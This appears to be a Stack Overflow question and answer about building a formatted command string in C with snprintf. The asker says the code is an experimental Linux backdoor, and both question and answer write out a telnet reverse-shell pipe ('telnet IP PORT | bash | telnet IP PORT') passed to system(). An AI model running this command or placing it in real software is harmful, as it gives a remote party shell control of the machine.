# How can i implement variables into a string?

Tags: python, c

I am a bit of a beginner here. I am making an experimental back door for Linux that uses telnet to handle sockets. How can I use a variable in a string, I am used to python so I often would do something like this:

```
     var0 = "asdf"
     var1 = "I like "+var0+" movies"
```

But in C I am puzzled, because if I use this:

```
     system("telnet %i %p | bash | telnet %i %p", IP, PORT);
```

I get this when executed:

```
     telnet: could not resolve %i/%p: Servname not supported for ai_socktype
```

%i/%p???
Can somebody please explain this to me.

Comment: The dublicate is not what i am looking for. I will edit in another example.

Comment: Good stuff - just make sure to keep the question as specific as possible ;)

Comment: @user3081016 In order to make my answer more correct I need to know the types of `IP` and `PORT` can you show their declaration / definition?

Answer (score 3, accepted):

You'll want to use [`snprintf`](http://en.cppreference.com/w/c/io/fprintf):

```
char cmd[512];
snprintf(cmd, sizeof cmd, "telnet %i %p | bash | telnet %i %p", IP, PORT, IP, PORT);
system(cmd);
```

Though `%i` expects an `int` and `%p` will print the given parameter as an implementation-defined pointer-representation (and thus will expect a pointer, but will not print what it points to). You need the correct format-specifiers depending on the types of `IP` and `PORT`.

Note that the `%i` and `%p` & other `%`-modifiers don't work in every C-string, they are only processed by the `*f` functions (the 'f'-suffix stands for format(ted)). As you can see, `system` doesn't process them and interprets them literally.

Comment: @user3081016 Probably not though as `telnet` expects a host-name (not a mere number) and a (numeric) port (which the printed-pointer is not likely to form properly). You need to specify the correct `%`-modifiers that correspond to the types of `IP` and `PORT`.